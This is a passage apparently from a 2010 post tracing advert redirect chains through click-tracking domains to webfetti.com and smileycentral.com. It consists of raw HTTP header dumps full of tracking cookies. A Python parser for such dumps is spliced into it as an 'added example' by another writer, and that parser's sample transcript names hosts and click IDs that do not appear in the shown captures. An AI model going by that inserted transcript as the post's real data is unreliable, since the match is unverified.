Set-Cookie: 1444-5449=1WhgdNsqXda7JGenynONkw%3D%3D%7CJ2404Gcek%2FzCxIBKZigM%2FhVCDd48NmFnyou4WBHLWtfcw2Jecf%2BxNYuTyYiCedUWuQWPqxUUi9feh17CTEiiTw%3D%3D; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-5449-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-5450=7LomrXgULt929GiWG5jf0g%3D%3D%7C9wakmhYex26XFYQrpQqMS%2FlHwikSnu0mht%2BPYLGXZb%2BObCo5DIFrk%2Fi4ExiY%2BLdijTCEfaQMlnoVPUDca40jpw%3D%3D; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-5450-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-5451=JwMW1js74qIieapB3WpJNw%3D%3D%7CRpJR7wMx93ueVmp10Zvw9tMV2m4%2BPv2yxblJlaLntrfO8GWGPGh7FuOX5j88evS5WhA4eY4o5Znv4h6zIMo5SQ%3D%3D; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-5451-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-5481=FqOS6ISyP8CfRFkVzZnyDA%3D%3D%7Cux%2FQ6C0Utm%2BYeSEQKK5xddyMRtwQ319FUKstK%2FX49vuTBGVzixsVTkLhrZbkgPyAqio70d7e4fwMcDRaCBWBfQ%3D%3D; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-5481-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-5482=TqQNc1PGPN%2FrkYY28xiX7w%3D%3D%7CE%2BhXF4RkXJo1ZoXFBjedvbaQj8TCR4yLh%2BAISaaGZ2VMhRuslDjTyc4mYlSdl9jZaPc%2Fmop8R501XTsQKEkMBA%3D%3D; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-5482-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-5483=hUmKRrUyDCTJHcIGj7c2HQ%3D%3D%7CQL5dFiB%2FfVOvqjlUmApbSxYRhEog6XDlXxvOpfNqAN0vTi5JDmp67rAENuiMR61%2BwEc%2BRF6LI1eG0S8Gs%2FmT8w%3D%3D; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-5483-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-6255=vZojfgVC9BlD3drz0wSKdw%3D%3D%7C3X9OxHiFeuoS0EJ2JOy%2FujFlC3s4XjfG8Rp3SRtPZMxzr5lXIticrs4Sl9KQuBU%2B%2Fza3zcdMlnbTcmg8H3jmwQ%3D%3D; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-6255-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-7742=C%2BFz0sqBLuTkryT1Tg8dzw%3D%3D%7C%2B8iXNv2Q7p%2FFPIh5xobW8WRLvg%2FKk%2BNkuG0EvzY7oyIQVbUJqv2f%2F4vhUjzehbNSXm9cFrK%2FvRapzjF3v%2F0jug%3D%3D; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-7742-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Content-Length: 802
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

------------------------------------------------------------------
GET /dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjQ3MV90b18xNDQ0 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: www.webfetti.com
Cookie: ltmcookie=2365676042.20480.0000; __utma=87938462.236408141.1266455021.1266455021.1266473839.2; __utmc=87938462; __utmz=87938462.1266455021.1.1.utmcsr=ZKxdm194|utmccn=(not+set)|utmcmd=(not+set); __utmb=87938462

HTTP/1.1 200 OK
Date: Thu, 18 Feb 2010 06:24:07 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Language: en-GB
Content-Length: 5445
Connection: close
Content-Type: text/html;charset=UTF-8

------------------------------------------------------------------
GET /dl/toolbarDetect/toolbar.js HTTP/1.1
Accept: */*
Referer: http://www.webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjQ3MV90b18xNDQ0
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
If-Modified-Since: Wed, 17 Feb 2010 19:46:07 GMT
If-None-Match: W/"35985-1266435967000"
Host: www.webfetti.com
Connection: Keep-Alive
Cookie: ltmcookie=2365676042.20480.0000; __utma=87938462.236408141.1266455021.1266455021.1266473839.2; __utmc=87938462; __utmz=87938462.1266455021.1.1.utmcsr=ZKxdm194|utmccn=(not+set)|utmcmd=(not+set); __utmb=87938462

HTTP/1.1 304 Not Modified
Date: Thu, 18 Feb 2010 06:24:10 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Connection: close
Vary: Accept-Encoding

------------------------------------------------------------------
GET /dl/generateExternalObject.js HTTP/1.1
Accept: */*
Referer: http://www.webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjQ3MV90b18xNDQ0
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
If-Modified-Since: Wed, 17 Feb 2010 19:46:07 GMT
If-None-Match: W/"7350-1266435967000"
Host: www.webfetti.com
Connection: Keep-Alive
Cookie: ltmcookie=2365676042.20480.0000; __utma=87938462.236408141.1266455021.1266455021.1266473839.2; __utmc=87938462; __utmz=87938462.1266455021.1.1.utmcsr=ZKxdm194|utmccn=(not+set)|utmcmd=(not+set); __utmb=87938462

HTTP/1.1 304 Not Modified
Date: Thu, 18 Feb 2010 06:24:10 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Connection: close
Vary: Accept-Encoding

------------------------------------------------------------------
GET /http%253A%252F%252Fplugin%252Esmileycentral%252Ecom%252Fassetserver%252Fcursor%252Ejhtml%253Fcur%253D1%2526i%253D9646a/image.gif HTTP/1.1
Accept: */*
Referer: http://www.webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjQ3MV90b18xNDQ0
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Host: plugin.smileycentral.com
Connection: Keep-Alive

HTTP/1.1 302 Found
Date: Thu, 18 Feb 2010 06:24:13 GMT
Server: Apache/1.3.27 (Unix) mod_jk/1.2.8
Location: http://plugin.smileycentral.com/assetserver/cursor.jhtml?cur=1&i=9646a
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
X-Pad: avoid browser bug

------------------------------------------------------------------
GET /__utm.gif?utmwv=6.1&utmn=1626143730&utmsr=1280x800&utmsc=32-bit&utmul=en-us&utmje=1&utmjv=1.3&utmfl=10.0&utmdt=Webfetti%20-%20Add%20FREE%20Customized%20Layouts%2C%20Generators%2C%20Graphics%20and%20Bling%20to%20Your%20Page%21&utmhn=www.webfetti.com&utmr=-&utmp=/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjQ3MV90b18xNDQ0 HTTP/1.1
Accept: */*
Referer: http://www.webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjQ3MV90b18xNDQ0
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Host: utm.trk.webfetti.com
Connection: Keep-Alive
Cookie: __utma=87938462.236408141.1266455021.1266455021.1266473839.2; __utmc=87938462; __utmz=87938462.1266455021.1.1.utmcsr=ZKxdm194|utmccn=(not+set)|utmcmd=(not+set); __utmb=87938462

HTTP/1.1 200 OK
Date: Thu, 18 Feb 2010 06:24:13 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Cache-control: no-store
Expires: -1
Last-Modified: Tue, 10 Feb 2009 19:06:11 GMT
ETag: "b4221-23-4991d023"
Accept-Ranges: bytes
Content-Length: 35
Connection: close
Content-Type: image/gif

------------------------------------------------------------------
GET /__utm.gif?utmwv=6.1&utmn=805765985&utmsr=1280x800&utmsc=32-bit&utmul=en-us&utmje=1&utmjv=1.3&utmfl=10.0&utmdt=Webfetti%20-%20Add%20FREE%20Customized%20Layouts%2C%20Generators%2C%20Graphics%20and%20Bling%20to%20Your%20Page%21&utmhn=www.webfetti.com&utmp=/clicks/splash/partner/ZKxdm194YYGB HTTP/1.1
Accept: */*
Referer: http://www.webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjQ3MV90b18xNDQ0
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Host: utm.trk.webfetti.com
Connection: Keep-Alive
Cookie: __utma=87938462.236408141.1266455021.1266455021.1266473839.2; __utmc=87938462; __utmz=87938462.1266455021.1.1.utmcsr=ZKxdm194|utmccn=(not+set)|utmcmd=(not+set); __utmb=87938462

HTTP/1.1 200 OK
Date: Thu, 18 Feb 2010 06:24:16 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Cache-control: no-store
Expires: -1
Last-Modified: Tue, 10 Feb 2009 19:06:12 GMT
ETag: "b4221-23-4991d024"
Accept-Ranges: bytes
Content-Length: 35
Connection: close
Content-Type: image/gif

------------------------------------------------------------------
GET /assetserver/cursor.jhtml?cur=1&i=9646a HTTP/1.1
Accept: */*
Referer: http://www.webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjQ3MV90b18xNDQ0
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Host: plugin.smileycentral.com
Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily
Date: Thu, 18 Feb 2010 06:24:16 GMT
Server: Apache/1.3.27 (Unix) mod_jk/1.2.8
Vary: Accept-Encoding
Location: http://i1img.com/images/cursormania/files/19/9646a.ani
Content-Language: en-GB
Content-Length: 0
Connection: close
Content-Type: text/html;charset=UTF-8

------------------------------------------------------------------
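To turn a dump like the one above into something readable at a glance, here is an added example (not the post's own code): it parses a transcript of request/response pairs separated by dashed lines into a redirect chain, checks that each Location was actually the next request made, lists the hosts touched and counts which of them set cookies. The transcript embedded in it is a trimmed copy of the first three exchanges above with the header lists and cookie values cut down; the separator convention and the function names are assumptions of mine.

```python
"""Reduce a request/response header dump to a redirect chain plus the hosts
that set cookies along it.

Added example. TRANSCRIPT is trimmed from the first three exchanges quoted
in the post (header lists and cookie values shortened); the dashed-line
separator and the function names are my own conventions.
"""
import re

TRANSCRIPT = """\
GET /click/?s=12064&c=209703 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: gnspf.com
Cookie: BIGipServertracking-pool=16912556.20480.0000

HTTP/1.1 302 Found
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 PHP/5.2.12
Location: http://fbgdc.com/click/?s=12064&c=209703&internal=P_i6q4m_1
Content-Length: 0

------------------------------------------------------------------
GET /click/?s=12064&c=209703&internal=P_i6q4m_1 HTTP/1.1
Host: fbgdc.com
Cookie: 1444-affiliate_id=31826; 1444-site_id=12064

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 PHP/5.2.12
Set-Cookie: 1444-2378=YdptRXGxNQG5IohFGonDgQ%3D%3D; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-2378-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Content-Length: 802
Content-Type: text/html; charset=utf-8

------------------------------------------------------------------
GET /dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826 HTTP/1.1
Host: www.webfetti.com

HTTP/1.1 200 OK
Server: Apache/2.2.11 (Unix) mod_jk/1.2.28
Content-Length: 5445
Content-Type: text/html;charset=UTF-8

------------------------------------------------------------------
"""

SEP_RE = re.compile(r"^-{5,}\s*$", re.MULTILINE)


def _parse_block(block):
    """Start line followed by 'Name: value' lines -> (start, [(name, value)]).
    Headers stay a list because Set-Cookie and Cache-Control repeat."""
    lines = block.strip().splitlines()
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def parse_transcript(text):
    """Split on the dashed separators, then split each exchange at its first
    blank line into the request block and the response block."""
    pairs = []
    for chunk in SEP_RE.split(text):
        blocks = [b for b in re.split(r"\n[ \t]*\n", chunk.strip()) if b.strip()]
        if len(blocks) >= 2:
            pairs.append((_parse_block(blocks[0]), _parse_block(blocks[1])))
    return pairs


def header(headers, name):
    return next((v for n, v in headers if n == name), None)


def request_url(start, headers):
    """'GET /path HTTP/1.1' plus the Host header -> the URL actually fetched."""
    _method, path, _version = start.split(" ", 2)
    return f"http://{header(headers, 'host')}{path}"


def redirect_chain(pairs):
    """One entry per exchange: URL, status, Location (if any), and whether the
    next request really went where that Location pointed."""
    chain = []
    for i, ((rq_start, rq_hdrs), (rs_start, rs_hdrs)) in enumerate(pairs):
        location = header(rs_hdrs, "location")
        followed = None
        if location and i + 1 < len(pairs):
            followed = request_url(*pairs[i + 1][0]) == location
        chain.append({
            "url": request_url(rq_start, rq_hdrs),
            "status": int(rs_start.split()[1]),
            "location": location,
            "followed": followed,
        })
    return chain


def hosts_touched(pairs):
    """Distinct Host values in request order (a blocklist starting point)."""
    seen = []
    for (_, rq_hdrs), _ in pairs:
        host = header(rq_hdrs, "host")
        if host and host not in seen:
            seen.append(host)
    return seen


def cookie_setters(pairs):
    """host -> number of Set-Cookie headers it returned (tracking footprint)."""
    counts = {}
    for (_, rq_hdrs), (_, rs_hdrs) in pairs:
        n = sum(1 for name, _ in rs_hdrs if name == "set-cookie")
        if n:
            host = header(rq_hdrs, "host")
            counts[host] = counts.get(host, 0) + n
    return counts


if __name__ == "__main__":
    exchanges = parse_transcript(TRANSCRIPT)
    for hop in redirect_chain(exchanges):
        print(hop["status"], hop["url"], "->", hop["location"], "followed:", hop["followed"])
    print("hosts:", hosts_touched(exchanges))
    print("cookie setters:", cookie_setters(exchanges))
```

What the chain shows is worth noting: the only real HTTP redirect is gnspf.com to fbgdc.com. fbgdc.com answers 200 with an 802-byte body and no Location, so the hop from there to webfetti.com is done by that HTML (or script in it), not by a header, which is why a Location-only view of a chain like this would miss a step.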


The second advert is pretty much the same outline as the first, though it doesn't seem to claim to be from myrewardsvault.com this time (if it does, it's in the blacked out part), and again, the URLs;

npvos.com/click/?s=12064&c=196741
fbgdc.com/click/?s=12064&c=196741&internal=U_136o6o_1
webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjE2Ml90b18xNDQ0


Headers:

GET /click/?s=12064&c=196741 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://short.strange-company.info/happy/27851
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Host: npvos.com
Connection: Keep-Alive
Cookie: BIGipServertracking-pool=17240236.20480.0000

HTTP/1.1 302 Found
Date: Thu, 18 Feb 2010 06:28:46 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 18 Feb 2010 06:28:46 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DEVa TAIa OUR BUS"
Location: http://fbgdc.com/click/?s=12064&c=196741&internal=U_136o6o_1
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

------------------------------------------------------------------
GET /click/?s=12064&c=196741&internal=U_136o6o_1 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://short.strange-company.info/happy/27851
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Host: fbgdc.com
Connection: Keep-Alive
Cookie: 1444=KpIYL2uZmgg4yIJzEYBGyQ%3D%3D%7CqjyUwp8DXB9V1V5TMGJkPSlTNVlAjeL74g6%2BPMEneNa4Z6RpC7zW9QFEWUcve0Yl%2B8oqlmF7zn90JSJZeTfITzv7oMCc0nToxsi1O19dKCB9lyanI4LgY73jrpHvpQ0kQqDBK8kdQVOy5%2FD1Aa%2B4X77aKrtx%2BEsk%2FzjS9rGchGL2u5drA7pq17NXA6MD2vrUlUCnEkGTUu2kWVNhvIATkCfIcHnPhfZGNLvmuKC5YRHqtTytab3RN9175GmloAb8AFIUKNIRfly%2FAbFbgowvkqvrAb3fTnaIfR3xIjng4JNs%2BVcyNo8r1fRoueThopUnE9tptsH80njl2oVhkHEEVdq%2FiY92tU4JVdxBe19osUel%2BbMWt9zUfrjnqmESICOaTT8S2liDyEL9SgAH8gqFgptKLC9ALKdHG%2F773bXPz3SvNFWrTDa9oerKJUy97AS4JBoBUsOU4%2FBsBm2pCQFV4ofrFt1lRukrYIRjuRLvgR%2B9oR04tutzZPEnbXOyM%2BVPv%2BEXbB8Vz7GJO2dnBBmas%2FtAdgDeog3lsf8qpHeUcMIldPB2Sc%2BZl%2FNRReOYYmfgvrCEoxUgOiiWXH3aQDfexZk%2BQMoI%2F940Fv8a968F7h8RD%2FIYHNAx3yQo7DR%2BnOFmEhHNdM6Dgq5mt6RbXR7G2F1xTnhcVu77FHRyzVWn%2Fx77bI7QGb0UtEJuWrLavrkMo5ONcGvMFFpZSdrStN1fCDy5GwnddxVd3l9qm2GlOpqoOGp6yWrqS%2Fad9VLSz3YML1%2BSadvEtjwilzHnhXzWQ6H31ThqsAgaRa1diaQtRAhhWRnxBGd222pTYZUYE2I4Q7sbrY5sTWz7ucyxh3LFsn64R%2FfZYI8H4f%2BsRjyiJbGUoUay6fdFJ4OFLP%2BB2b20jkGrNXfylMsUlp1LNS%2FCkLPQNwlv8BRvC8r%2F2Xh6QfPDmDVx%2FUFjCRHd6o0fdtXk%2FyVxoloxn8HZseQR%2BxW6HTCLjb%2FKBv19l5PVzzHirZs%3D; 1444-encoded_click=HDYls521-; 1444-affiliate_id=31826; 1444-site_id=12064; 1444-subid=redirect_from_6471_to_1444; 1444-2378=YdptRXGxNQG5IohFGonDgQ%3D%3D%7CJE3gg24QTSzyuX22CcyLBjJTH%2FFW4bJS4swvdXvptwYz4QRk1mrQNIXg1F6oI1t8xItVV%2FsQjq2XbSMPTLXpKw%3D%3D; 1444-2378-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-5449=1WhgdNsqXda7JGenynONkw%3D%3D%7CJ2404Gcek%2FzCxIBKZigM%2FhVCDd48NmFnyou4WBHLWtfcw2Jecf%2BxNYuTyYiCedUWuQWPqxUUi9feh17CTEiiTw%3D%3D; 1444-5449-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-5450=7LomrXgULt929GiWG5jf0g%3D%3D%7C9wakmhYex26XFYQrpQqMS%2FlHwikSnu0mht%2BPYLGXZb%2BObCo5DIFrk%2Fi4ExiY%2BLdijTCEfaQMlnoVPUDca40jpw%3D%3D; 1444-5450-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-5451=JwMW1js74qIieapB3WpJNw%3D%3D%7CRpJR7wMx93ueVmp10Zvw9tMV2m4%2BPv2yxblJlaLntrfO8GWGPGh7FuOX5j88evS5WhA4eY4o5Znv4h6zIMo5SQ%3D%3D; 
1444-5451-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-5481=FqOS6ISyP8CfRFkVzZnyDA%3D%3D%7Cux%2FQ6C0Utm%2BYeSEQKK5xddyMRtwQ319FUKstK%2FX49vuTBGVzixsVTkLhrZbkgPyAqio70d7e4fwMcDRaCBWBfQ%3D%3D; 1444-5481-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-5482=TqQNc1PGPN%2FrkYY28xiX7w%3D%3D%7CE%2BhXF4RkXJo1ZoXFBjedvbaQj8TCR4yLh%2BAISaaGZ2VMhRuslDjTyc4mYlSdl9jZaPc%2Fmop8R501XTsQKEkMBA%3D%3D; 1444-5482-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-5483=hUmKRrUyDCTJHcIGj7c2HQ%3D%3D%7CQL5dFiB%2FfVOvqjlUmApbSxYRhEog6XDlXxvOpfNqAN0vTi5JDmp67rAENuiMR61%2BwEc%2BRF6LI1eG0S8Gs%2FmT8w%3D%3D; 1444-5483-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-6255=vZojfgVC9BlD3drz0wSKdw%3D%3D%7C3X9OxHiFeuoS0EJ2JOy%2FujFlC3s4XjfG8Rp3SRtPZMxzr5lXIticrs4Sl9KQuBU%2B%2Fza3zcdMlnbTcmg8H3jmwQ%3D%3D; 1444-6255-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-7742=C%2BFz0sqBLuTkryT1Tg8dzw%3D%3D%7C%2B8iXNv2Q7p%2FFPIh5xobW8WRLvg%2FKk%2BNkuG0EvzY7oyIQVbUJqv2f%2F4vhUjzehbNSXm9cFrK%2FvRapzjF3v%2F0jug%3D%3D; 1444-7742-converting=317a05143c8f1656b95559c0f339974892f4cd69; BIGipServertracking-pool=16978092.20480.0000

HTTP/1.1 200 OK
Date: Thu, 18 Feb 2010 06:28:49 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 18 Feb 2010 06:28:49 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DEVa TAIa OUR BUS"
Set-Cookie: 1444-2378=DL9SiYGr7dCPA55N3H%2Bp%2FQ%3D%3D%7Cm%2B0JeXztVz3VC%2F%2BUInGWSGBNf1aSA77NnlUYKsYAapoNdhuLpYMlFcPOFiNa1qbgM9NQvbSP5HOOFJWwXVkOjQ%3D%3D; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-2378-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-5449=q5ZNWkuyU6AWgWU2X3SXig%3D%3D%7CFGSJw8rY3%2F4IWWm4yrvulf9upqqTljhVz%2FPeAgaKugYQOgSq8MW%2FE5KhAlswPpOfA58BEN%2BJwuu%2F%2BDHVd%2BlJGw%3D%3D; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-5449-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-5450=bu90d63x5AJ9wsBf3N46mg%3D%3D%7CY4TruIbXDnmUoOV0h8UnK566RrpFk5zZfnQNn3lunXDOuRcyXZIbcCi62HR9dALsNVE%2FYimuGkMlpL%2BEDHZV9w%3D%3D; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-5450-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-5451=mx4fZhZ%2BVw5sc%2FVMYhzPbg%3D%3D%7CJmE2n0WQa8EXbnHXk7sIWSbq9O9x5Jn3ybSkEhGzj%2BU%2BHbVhhmLhU1GfHvr3zTc%2B2F2GTxS1OfKWTnOK1UaZmQ%3D%3D; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-5451-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-5481=yJ4HBleHToQYTWb2C8GcIg%3D%3D%7CZKmukpuqaU%2BqKiFl80DRZbNDljGB3gNDG%2BjRHZsB%2FvfaRk36hLbpqXeFhcwol99T5Xtc4R53O8kjJUsw07BelA%3D%3D; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-5481-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-5482=mlI4l6CJ3TlsQlbGNL0ueg%3D%3D%7C0rh8C1n4zqEA7UoeLsWdnb8QVXWnCOzQ3LgMnNgwg%2F%2F2iy4rDvw3snabtmZVn5DEvYoFf4f%2BhgGL6dCRafZAFw%3D%3D; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-5482-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-5483=pwlBftSpPdOWRuke7vfARA%3D%3D%7CXQDHuUCkScii1fNK5yvUWqzRpVKyJLXri7vUmJ6mwSvm8bEM%2BRBEQpCf4xM31ykQ98rxmq3tHbINiDTXZdcF2Q%3D%3D; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-5483-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-6255=8P%2B7C495%2FHaYEGIvyphgmA%3D%3D%7C7eqmYSxN1VkkT7SmRKKscKLtn69LzuU85Up1BsDAUatbMYH8obJdEVsJpxO%2F5OR3cLYvhPnuBN1PVtARvK2GzA%3D%3D; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-6255-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
